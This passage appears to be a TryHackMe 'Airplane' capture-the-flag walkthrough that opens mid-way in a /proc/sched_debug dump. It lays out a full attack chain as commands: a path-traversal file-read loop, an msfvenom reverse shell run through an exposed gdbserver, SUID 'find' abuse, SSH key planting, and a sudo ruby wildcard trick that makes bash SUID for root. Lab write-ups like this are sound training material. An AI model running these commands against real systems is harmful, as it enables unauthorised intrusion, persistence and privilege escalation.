  .clock_task                    : 643028.517425
  .avg_idle                      : 775367
  .max_idle_balance_cost         : 500000

cfs_rq[1]:/autogroup-75
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 200.684759
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15571.272838
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 1024
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 643028.517425
  .se->vruntime                  : 17527.430112
  .se->sum_exec_runtime          : 192.481980
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 17531.774936
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 1759.817339
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[1]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.025151
  .rt_runtime                    : 950.000000

dl_rq[1]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       537.273494      2350   120         0.000000       859.165562         0.000000 0 0 /autogroup-2
 S       kthreadd     2     14984.839338       151   120         0.000000         4.802150         0.000000 0 0 /
 I      rcu_sched    10     17525.908859     11330   120         0.000000       131.406498         0.000000 0 0 /
 S        cpuhp/1    15       949.558725        11   120         0.000000         0.213851         0.000000 0 0 /
 S  idle_inject/1    16        -3.000000         3    49         0.000000         0.000000         0.000000 0 0 /
 S    migration/1    17        37.019061       271     0         0.000000         3.809587         0.000000 0 0 /
 S    ksoftirqd/1    18     17524.158281       696   120         0.000000        44.243722         0.000000 0 0 /
 I   kworker/1:0H    20       709.399861         5   100         0.000000         0.032308         0.000000 0 0 /
 S      kdevtmpfs    21      4698.593452       174   120         0.000000         3.691691         0.000000 0 0 /
 I          netns    22         4.951421         2   100         0.000000         0.000000         0.000000 0 0 /
 Srcu_tasks_kthre    23         2.958667         2   120         0.000000         0.007244         0.000000 0 0 /
 S        kauditd    24      7533.989746        23   120         0.000000         0.539318         0.000000 0 0 /
 I    kworker/1:1    25     15014.225783       583   120         0.000000        29.198933         0.000000 0 0 /
 S     khungtaskd    26     17406.420670         7   120         0.000000         0.259229         0.000000 0 0 /
 S     kcompactd0    29        14.958661         2   120         0.000000         0.000000         0.000000 0 0 /
 S     khugepaged    31        14.958661         2   139         0.000000         0.000000         0.000000 0 0 /
 I        kblockd    78        20.979452         2   100         0.000000         0.000000         0.000000 0 0 /
 I     tpm_dev_wq    80        60.960859         2   100         0.000000         0.006523         0.000000 0 0 /
 I             md    82        66.960856         2   100         0.000000         0.000000         0.000000 0 0 /
 I     devfreq_wq    84        66.960856         2   100         0.000000         0.000000         0.000000 0 0 /
 S        kswapd0    88       210.839317         3   120         0.000000         0.022832         0.000000 0 0 /
 Secryptfs-kthrea    89       174.713319         2   120         0.000000         0.014811         0.000000 0 0 /
 I       kthrotld    91       186.754519         2   100         0.000000         0.014095         0.000000 0 0 /
 I  ipv6_addrconf    94       227.065585         2   100         0.000000         0.025127         0.000000 0 0 /
 I   kworker/u5:0   106       247.930495         2   100         0.000000         0.012630         0.000000 0 0 /
 I        nvme-wq   154       482.722329         2   100         0.000000         0.011813         0.000000 0 0 /
 I            ena   155       487.385448         2   100         0.000000         0.020031         0.000000 0 0 /
 I  nvme-reset-wq   156       492.844671         2   100         0.000000         0.017892         0.000000 0 0 /
 I nvme-delete-wq   157       499.654263         2   100         0.000000         0.005614         0.000000 0 0 /
 Sjbd2/nvme0n1p5-   181     17525.060853     13317   120         0.000000       392.987924         0.000000 0 0 /
 I   kworker/1:1H   194     17524.980428       291   100         0.000000         2.365119         0.000000 0 0 /
 Ssystemd-journal   223        99.302072      1153   119         0.000000       266.193735         0.000000 0 0 /autogroup-3
 I    kworker/1:3   241     15014.188993      1522   120         0.000000        40.560353         0.000000 0 0 /
 S          loop1   265      7478.823442        88   100         0.000000         1.578729         0.000000 0 0 /
 S          loop4   268      7478.825162        84   100         0.000000         1.045874         0.000000 0 0 /
 Ssystemd-network   292        65.517126       101   120         0.000000        69.584368         0.000000 0 0 /autogroup-27
 S     sd-resolve   301         9.288157        16   120         0.000000         2.727973         0.000000 0 0 /autogroup-30
 S          gdbus   482        22.249785       139   120         0.000000        10.277133         0.000000 0 0 /autogroup-35
 S          acpid   367         0.730278        16   120         0.000000         3.419987         0.000000 0 0 /autogroup-39
 S        anacron   368       399.643480        15   120         0.000000         4.206220         0.000000 0 0 /autogroup-36
 S   avahi-daemon   370        11.235924       261   120         0.000000        27.676736         0.000000 0 0 /autogroup-38
 S NetworkManager   376        27.763274       481   120         0.000000        56.933748         0.000000 0 0 /autogroup-43
 S     irqbalance   383         6.756058        74   120         0.000000        24.759695         0.000000 0 0 /autogroup-48
 S          gmain   413         1.209262         1   120         0.000000         0.048343         0.000000 0 0 /autogroup-48
 Snetworkd-dispat   385        67.180817       306   120         0.000000       113.420676         0.000000 0 0 /autogroup-49
 S          gmain   434         0.010884         2   120         0.000000         0.038980         0.000000 0 0 /autogroup-52
 S       rsyslogd   388         9.716708        33   120         0.000000         7.026272         0.000000 0 0 /autogroup-50
 S          snapd   390        18.949459       238   120         0.000000        29.738045         0.000000 0 0 /autogroup-55
 S          snapd   488        13.035884        51   120         0.000000         1.543868         0.000000 0 0 /autogroup-55
 S          snapd   489        13.002454         3   120         0.000000         0.114835         0.000000 0 0 /autogroup-55
 S          snapd   623      3902.615575      7307   120         0.000000      2116.799904         0.000000 0 0 /autogroup-55
 S          snapd  1004      3852.665994      6527   120         0.000000      2155.894714         0.000000 0 0 /autogroup-55
 Sswitcheroo-cont   391         6.371254        46   120         0.000000        16.118601         0.000000 0 0 /autogroup-54
 S          gmain   430         5.380134         1   120         0.000000         0.043780         0.000000 0 0 /autogroup-54
 S          gdbus   481        12.314453        14   120         0.000000         0.703130         0.000000 0 0 /autogroup-54
 S systemd-logind   395        31.517685       934   120         0.000000       117.482963         0.000000 0 0 /autogroup-57
 S          gdbus   484        16.555120        57   120         0.000000         3.928079         0.000000 0 0 /autogroup-56
 S probing-thread   527        14.087137         4   120         0.000000         0.082630         0.000000 0 0 /autogroup-56
 S          cupsd   473        10.929448        72   120         0.000000        16.159782         0.000000 0 0 /autogroup-67
 S   cups-browsed   485        10.060922       216   120         0.000000        27.970460         0.000000 0 0 /autogroup-69
 S          gmain   521         2.605798         1   120         0.000000         0.040173         0.000000 0 0 /autogroup-69
 S          gdbus   522         7.039665        41   120         0.000000         5.304445         0.000000 0 0 /autogroup-69
 S        python3   532       200.684759      1597   120         0.000000       302.964948         0.000000 0 0 /autogroup-75
 Sunattended-upgr   536        74.051800       218   120         0.000000        96.935569         0.000000 0 0 /autogroup-77
 S          gmain   621        75.722099         1   120         0.000000         0.029839         0.000000 0 0 /autogroup-77
 S           sshd   552         9.479976         9   120         0.000000        11.746325         0.000000 0 0 /autogroup-80
 Samazon-ssm-agen   553        25.588294       244   120         0.000000        29.271736         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   601        10.365611        32   120         0.000000         0.565753         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   602        19.907144        18   120         0.000000         4.026165         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   603        21.117699        47   120         0.000000         3.266141         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   604        19.855548         2   120         0.000000         0.085098         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   624        44.390512       174   120         0.000000        15.582552         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   625        43.679397       237   120         0.000000        14.789134         0.000000 0 0 /autogroup-81
 I    kworker/1:5   556     17526.046283      1708   120         0.000000        35.342229         0.000000 0 0 /
 S          gmain   572         2.302931         2   120         0.000000         0.127739         0.000000 0 0 /autogroup-84
 S     kerneloops   563         2.882907        18   120         0.000000         4.390081         0.000000 0 0 /autogroup-87
 S     kerneloops   565         1.309372        17   120         0.000000         5.467969         0.000000 0 0 /autogroup-89
 t       airplane   569         8.352077         6   120         0.000000         1.493160         0.000000 0 0 /autogroup-74
 S          gmain   656        54.205485         3   120         0.000000         0.147337         0.000000 0 0 /autogroup-95
 S        systemd   665        12.808756       106   120         0.000000        84.281211         0.000000 0 0 /autogroup-98
 S       (sd-pam)   666         2.382076         1   120         0.000000         0.255692         0.000000 0 0 /autogroup-98
 S    dbus-daemon   674         8.648518       101   120         0.000000        11.644721         0.000000 0 0 /autogroup-102
 S   rtkit-daemon   679         6.291148        31   121         0.000000         6.508985         0.000000 0 0 /autogroup-103
 S   rtkit-daemon   681         0.000000        88     0         0.000000         1.925818         0.000000 0 0 /autogroup-103
 Sgdm-session-wor   711        60.250730       118   120         0.000000        15.312143         0.000000 0 0 /autogroup-95
 S          gmain   713        54.498284         5   120         0.000000         0.125817         0.000000 0 0 /autogroup-95
 S    InputThread   737        74.937758         4   120         0.000000         0.137840         0.000000 0 0 /autogroup-105
 S    dbus-daemon   741      2447.123408       811   120         0.000000        84.505766         0.000000 0 0 /autogroup-105
 Sgnome-session-b   742      2440.524676       218   120         0.000000        49.776167         0.000000 0 0 /autogroup-105
 S          gdbus   764      2440.615243       385   120         0.000000        26.849419         0.000000 0 0 /autogroup-105
 Sat-spi-bus-laun   745       245.115815        34   120         0.000000         5.221875         0.000000 0 0 /autogroup-105
 S          gmain   746        95.522980         2   120         0.000000         0.080964         0.000000 0 0 /autogroup-105
 S   dconf worker   747       102.551490        10   120         0.000000         1.028514         0.000000 0 0 /autogroup-105
 S          gdbus   749       245.415845        26   120         0.000000         1.825463         0.000000 0 0 /autogroup-105
 S    gnome-shell   782      2477.017748      4977   120         0.000000      2296.556864         0.000000 0 0 /autogroup-105
 S          gdbus   787      2447.218177       819   120         0.000000        58.263072         0.000000 0 0 /autogroup-105
 S     llvmpipe-1   791      2470.925577       769   120         0.000000       675.515767         0.000000 0 0 /autogroup-105
 S    gnome-shell   792       292.549162         1   120         0.000000         0.020753         0.000000 0 0 /autogroup-105
 S    gnome-shell   793       304.540428         1   120         0.000000         0.053863         0.000000 0 0 /autogroup-105
 S gnome-s:disk$0   794      1668.046363        19   139         0.000000         4.254597         0.000000 0 0 /autogroup-105
 S          gmain   812       669.178217         3   120         0.000000         0.271988         0.000000 0 0 /autogroup-105
 S          gmain   818       684.211867         1   120         0.000000         0.047456         0.000000 0 0 /autogroup-105
 S       ibus-x11   817      1710.261956       117   120         0.000000        28.098516         0.000000 0 0 /autogroup-105
 S          gdbus   825       707.760876         2   120         0.000000         0.143083         0.000000 0 0 /autogroup-105
 S          gmain   830       746.170508         2   120         0.000000         0.068172         0.000000 0 0 /autogroup-105
 S          gmain   828       728.449731         1   120         0.000000         0.053425         0.000000 0 0 /autogroup-105
 S          gdbus   829      1293.811322        42   120         0.000000         3.598901         0.000000 0 0 /autogroup-105
 Sxdg-permission-   834      1229.402935        20   120         0.000000         6.262062         0.000000 0 0 /autogroup-105
 S          gdbus   837      1229.225627        23   120         0.000000         1.555898         0.000000 0 0 /autogroup-105
 S     pulseaudio   842         3.873497        84   109         0.000000        48.211883         0.000000 0 0 /autogroup-110
 S      null-sink   843         0.000000        20    94         0.000000         0.667607         0.000000 0 0 /autogroup-110
 S     snapd-glib   844         3.788302         1   120         0.000000         0.136552         0.000000 0 0 /autogroup-110
 S      JS Helper   861      1738.934353        16   120         0.000000         2.121665         0.000000 0 0 /autogroup-105
 S      JS Helper   862      1739.440298         9   120         0.000000         2.534715         0.000000 0 0 /autogroup-105
 S          gmain   863      1155.784364         1   120         0.000000         0.051073         0.000000 0 0 /autogroup-105
 S          gdbus   864      1210.818127        18   120         0.000000         1.848280         0.000000 0 0 /autogroup-105
 S          gmain   907      1250.545843         1   120         0.000000         0.033569         0.000000 0 0 /autogroup-105
 S      gsd-wacom   869      1737.272560       202   120         0.000000        40.963231         0.000000 0 0 /autogroup-105
 S          gmain   927      1271.201773         2   120         0.000000         0.060739         0.000000 0 0 /autogroup-105
 S          gdbus   968      1293.111429        34   120         0.000000         1.922080         0.000000 0 0 /autogroup-105
 S      gsd-color   871      2469.967462       373   120         0.000000        38.750066         0.000000 0 0 /autogroup-105
 S          gdbus   947      2446.986934       185   120         0.000000        13.477612         0.000000 0 0 /autogroup-105
 S   gsd-keyboard   872      1737.288195       205   120         0.000000        27.573433         0.000000 0 0 /autogroup-105
 S          gmain   928      1255.390821         1   120         0.000000         0.046543         0.000000 0 0 /autogroup-105
 S          gdbus   934      1737.336962       103   120         0.000000         5.055173         0.000000 0 0 /autogroup-105
 Sgsd-print-notif   873      1293.039330        86   120         0.000000        13.187106         0.000000 0 0 /autogroup-105
 S          gdbus   911      1293.105662        54   120         0.000000         3.657100         0.000000 0 0 /autogroup-105
 S          gmain   893      1242.598002         1   120         0.000000         0.031651         0.000000 0 0 /autogroup-105
 Spool-gsd-smartc   905      1254.487901         3   120         0.000000         0.132032         0.000000 0 0 /autogroup-105
 S   dconf worker   906      1250.678952         2   120         0.000000         0.166677         0.000000 0 0 /autogroup-105
 S   dconf worker   956      1271.045566         2   120         0.000000         0.143373         0.000000 0 0 /autogroup-105
 S gsd-media-keys   877      1769.329104       232   120         0.000000        39.759048         0.000000 0 0 /autogroup-105
 S   dconf worker   948      1268.656120         6   120         0.000000         0.407456         0.000000 0 0 /autogroup-105
 Sgsd-screensaver   879      1293.037631        51   120         0.000000         7.014632         0.000000 0 0 /autogroup-105
 S          gdbus   903      1293.118100        49   120         0.000000         3.635045         0.000000 0 0 /autogroup-105
 S      gsd-sound   881      1293.037772        52   120         0.000000        10.824817         0.000000 0 0 /autogroup-105
 S          gmain   897      1244.524906         2   120         0.000000         0.056686         0.000000 0 0 /autogroup-105
 S          gdbus   899      1293.116441        49   120         0.000000         3.841359         0.000000 0 0 /autogroup-105
 S   dconf worker   913      1248.037070         7   120         0.000000         0.153213         0.000000 0 0 /autogroup-105
 S          gmain   889      1239.634513         2   120         0.000000         0.068539         0.000000 0 0 /autogroup-105
 S          gdbus   902      1293.102228        67   120         0.000000         3.351349         0.000000 0 0 /autogroup-105
 S   dconf worker   910      1737.229500         8   120         0.000000         0.313753         0.000000 0 0 /autogroup-105
 S      gsd-power   888      2457.769762       216   120         0.000000        34.972179         0.000000 0 0 /autogroup-105
 S          gdbus   935      2447.212700       123   120         0.000000         9.418665         0.000000 0 0 /autogroup-105
 S   dconf worker   942      1264.351468         2   120         0.000000         0.266798         0.000000 0 0 /autogroup-105
 S          gmain   961      1273.202341         1   120         0.000000         0.049129         0.000000 0 0 /autogroup-105
 S          gmain   972       146.977017         3   120         0.000000         0.105909         0.000000 0 0 /autogroup-114
 Ssystemd-timedat  1007       174.555389      2220   120         0.000000       281.078772         0.000000 0 0 /autogroup-116
 I   kworker/u4:1  1159     17525.820074       101   120         0.000000         2.671951         0.000000 0 0 /
 Supdate-notifier  1187       401.004846         4   120         0.000000         0.313600         0.000000 0 0 /autogroup-36

The file contents has a section labeled runnable tasks which lists all the tasks (processes or threads) that are considered runnable by the scheduler. The S column shows the Process status (S: Sleeping, R: Running, I: Idle).

Extracting information from these processes (PIDs):

We can try to fetch the command line arguments for the various processes by substituting the PIDs within: /proc/[pid]/cmdline. Manually doing so is practically not possible as we have lots of processes based on the sched_debug file content. Writing a script is what would help.

The script:

This is a simple script written in bash:

curl "http://airplane.thm:8000/?page=../../../../../../proc/sched_debug" | awk '/^runnable tasks:/,/^$/ {if ($3 ~ /^[0-9]+$/) print $3}' | while IFS= read -r pid; do
    echo "PID $pid cmdline:"
    curl --output - "http://airplane.thm:8000/?page=../../../../../../proc/$pid/cmdline"
    echo -e "\n--------------------------------------------------"
done

Explanation:

This fetches the contents of the sched_debug file:

curl "http://airplane.thm:8000/?page=../../../../../../proc/sched_debug"

/^runnable tasks:/,/^$/: This part tells awk to look for lines starting with runnable tasks: and continue until it finds an empty line.

{if ($3 ~ /^[0-9]+$/) print $3}: Inside the runnable tasks section, it checks if the third column ($3) is a number (PID) and then it prints that number:

| awk '/^runnable tasks:/,/^$/ {if ($3 ~ /^[0-9]+$/) print $3}'

This takes each PID found by awk and loops through them:

| while IFS= read -r pid; do

For each PID, it then fetches and display its cmdline:

    echo "PID $pid cmdline:"
    curl --output - "http://airplane.thm:8000/?page=../../../../../../proc/$pid/cmdline"
    echo -e "\n--------------------------------------------------"
done

Running the script:

We then come across this cmdline that stands out:

/usr/bin/gdbserver0.0.0.0:6048airplane

Finally we now know what exactly is running on port 6048. It is gdbserver. This is a tool that enables the debugging of programs remotely.

Based on the command gdbserver is listening on all network interfaces (0.0.0.0) on port 6048 and the executable program that gdbserver is said to debug is airplane.

This executable can also be found running as a process:

This binary can be downloaded via LFI as we have it's location, and it can be run:

Command:

curl --output airplane http://airplane.thm:8000/\?page\=../../../../opt/airplane

Nothing interesting could be found post reverse engineering it. Let us go back to check out the gdbserver and find ways to exploit it.

Metasploit Exploit:

We have to set the RHOSTS, RPORT, LPORT and the target architecture, on which the payload will be based.

First up, we have to find the target machine's arch. We can do the same by fetching the /proc/version file:

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../proc/version

This file specifies the version of the Linux kernel, the version of gcc used to compile the kernel, and the time of kernel compilation.

It says amd64, so it is a 64-bit machine. The target can be now set to x86_64 (Id - 1).

Setting up the options:

Running the exploit:

We have got a shell as the user hudson. The same can be done without using Metasploit too.

Exploitation w/o Metasploit:

Commands:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=5555 PrependFork=true -f elf -o binary.elf  //The IP here is the tun0 interface IP

Now set up a listener on port 5555:

chmod +x binary.elf
gdb binary.elf  //If gdb isn't installed, type in: apt install gdb -y
target extended-remote airplane.thm:6048

remote put binary.elf /tmp/binary.elf

set remote exec-file /tmp/binary.elf

run

We can place the binary in the /tmp directory as it is universally writeable:

The moment we type in run, we can see we have got a connection on the listener on port 5555:

Now we can upgrade the shell a little by running this:

Commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

The user flag is within carlos's home directory:

Command:

find / -name user.txt 2> /dev/null

So now we have to laterally move to carlos from hudson, unless we directly get to root.

Enumeration:

Checking for binaries that have the SUID bit set:

Command:

find / -perm -u=s -type f 2>/dev/null

The find binary has the SUID bit set. Files which have SUID permissions run with higher privileges.

Searching in GTFOBins:

Command:

find . -exec /bin/sh -p \; -quit

The EUID (Effective User ID) bit is now set to carlos. This means that the shell that we got has the effective permissions and privileges associated with the user carlos, but the shell session itself is running as the user hudson. So the shell is still in the context of hudson.

The user flag can be found it carlos's home directory:

We can now generate a ssh key pair and the public key can be placed on the target machine inside the /.ssh directory within carlos's home directory as authorized_keys:

Command:

ssh-keygen -t rsa

Now we can SSH in as carlos:

Command:

ssh carlos@airplane.thm

Now we have a full fledged shell as carlos.

Privilege Escalation: We can now check for carlos's sudo rights/privs:

This command: /usr/bin/ruby /root/*.rb can be run as any user without us being prompted to enter a password. By making use of that command we would be able to get to root.

The security risk:

The problem here is, the command: /usr/bin/ruby /root/*.rb has a wildcard character (*) in the path argument and this command can be run by us with sudo rights, basically with elevated privs. * matches any character (including whitespaces), so we can modify the path as needed via a simple path traversal. We can get a root shell this way.

Command:

echo '`chmod u+s /bin/bash`' > shell.rb

The file when run with elevated privs, will set the SUID bit on the bash binary.

The command can be run within carlos's home directory as we as carlos will have write permissions on it:

Getting a root shell:

Command:

sudo /usr/bin/ruby /root/../../home/carlos/shell.rb

Now let us check out the bash binary:

The SUID bit has been indeed set.

Now we can just type in this to get a root shell:

Command:

bash -p

When bash is invoked with the -p option, it starts in privileged mode. Normally, when bash starts, it drops certain privileges for security reasons. The -p flag prevents bash from doing this.

We are root.

A simpler way to do the same would be directly spawning a bash shell, like so:

Now we can fetch the root flag from the /root directory.

Room solved!!

CC BY-NC 4.0
AirplaneTryHackMe
Room Link
Port 6048 (tcp/udp)SpeedGuide
Logo
6000 - Pentesting X11HackTricks
/proc - Get Linux Process and Hardware InformationHow to Use /proc File System to Monitor Linux System
Logo
Logo
GDB Server Remote Payload ExecutionRapid7
Logo
Pentesting Remote GdbServer | HackTricks | HackTricks
find | GTFOBins
Logo
TryHackMe | gravereaper2038TryHackMe
Profile Link
Logo
Logo
Logo
Page cover image